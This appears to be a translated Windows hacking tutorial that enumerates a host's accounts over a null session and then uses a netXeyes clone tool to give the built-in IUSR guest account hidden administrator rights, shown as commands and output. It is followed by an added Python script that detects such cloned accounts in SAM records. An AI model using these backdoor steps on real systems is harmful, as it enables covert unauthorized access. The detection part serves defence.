The steps:
1. Assume that a scan has obtained, on the host 192.168.0.1, the user "test" with password "test", a member of the Administrators group.
2. Use GetAccount (http://www.lsky.org/download/GetAccount.exe) to obtain information about the accounts that already exist on the system; a null session also works.
C:\>getaccount \\192.168.0.1 1
GetAccount Via SID, by netXeyes 2002/04/06
Connect To Host 192.168.0.1.... OK
Start Ememurate Account....
Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators
Disconnect The Host 192.168.0.1.... OK
3. Use SA.exe to clone iusr_victim as Administrator.
C:\>ca \\192.168.0.1 test test iusr_victim password
Clone the Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, email@example.com
Connect 192.168.0.1.... OK
Get the SID of iusr_victim.... OK
Prepairing.... OK
Processing.... OK
Clean Up.... OK
At this point iusr_victim has become a super user with the same settings as Administrator (desktop, menus, etc.).
On 192.168.0.1, viewing the result with the Net command:
User name                    IUSR_VICTIM
Full Name                    Internet Guest Account
Comment                      Built-in account for anonymous access to Internet Information Services
User's comment               Built-in account for anonymous access to Internet Information Services
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2002/4/28 PM 10:31
Password expires             Never
Password changeable          2002/4/28 PM 10:31
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2002/4/28 PM 09:02

Logon hours allowed          All

Local Group Memberships      Guests
Global Group memberships     None
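The Net output above still lists IUSR_VICTIM only under Guests, so group membership alone does not reveal the clone; a defender has to compare the per-account SAM records themselves. The following Python is an added example, not part of the original page or of the netXeyes tools. It assumes (verify on your own systems) that each local account's SAM key holds a binary "F" value whose 4 bytes at offset 0x30 store the account's own RID little-endian, and that cloning overwrites one account's F value with Administrator's; all account records in it are constructed inline.

```python
"""Check local SAM account records for signs of SID cloning.

Added example, not part of the original tutorial or of the netXeyes
tools. Assumption (verify on your own systems): each account's SAM key
holds a binary "F" value whose 4 bytes at offset 0x30 store the account's
own RID little-endian, and a clone overwrites one account's F value with
Administrator's. All records below are constructed test data.
"""
import struct

RID_OFFSET = 0x30  # assumed position of the RID inside the F value


def make_f_value(rid, filler=0):
    """Build a synthetic 0x50-byte F record (constructed test data only)."""
    buf = bytearray(0x50)
    struct.pack_into("<Q", buf, 0x08, filler)  # stands in for per-account timestamps
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def embedded_rid(f_value):
    """RID stored inside the F record (under the layout assumption above)."""
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def find_cloned_accounts(accounts):
    """accounts: {username: (rid_from_key_name, f_value_bytes)}.

    Returns {username: [reasons]} for accounts that look cloned:
      - the RID inside F does not match the RID the key is named after;
      - the F record is byte-identical to another account's F record.
    """
    findings = {}
    by_f_value = {}
    for name, (key_rid, f_value) in accounts.items():
        inner = embedded_rid(f_value)
        if inner != key_rid:
            findings.setdefault(name, []).append(
                f"key RID {key_rid} but F record carries RID {inner}")
        by_f_value.setdefault(f_value, []).append(name)
    for names in by_f_value.values():
        if len(names) > 1:
            for n in names:
                others = ", ".join(x for x in names if x != n)
                findings.setdefault(n, []).append(f"F record identical to {others}")
    return findings


# Constructed sample: IUSR_VICTIM's key RID is 1001, but its F record was
# copied from Administrator (RID 500), mirroring the result shown on this page.
ADMIN_F = make_f_value(500, filler=0x01C1EE8A)
SAMPLE_ACCOUNTS = {
    "Administrator": (500, ADMIN_F),
    "Guest": (501, make_f_value(501, filler=0x01C1EE8B)),
    "IUSR_VICTIM": (1001, ADMIN_F),
    "zjf": (1002, make_f_value(1002, filler=0x01C1EE8C)),
}

if __name__ == "__main__":
    for name, reasons in find_cloned_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{name}: " + "; ".join(reasons))
```

The RID comparison is the primary check; the byte-identical comparison is a fallback that still fires right after a clone even if the assumed offset is wrong for a given Windows version, but it goes quiet once later logons update the copied record, so run such a check soon after suspected compromise and keep a baseline of the F values for comparison.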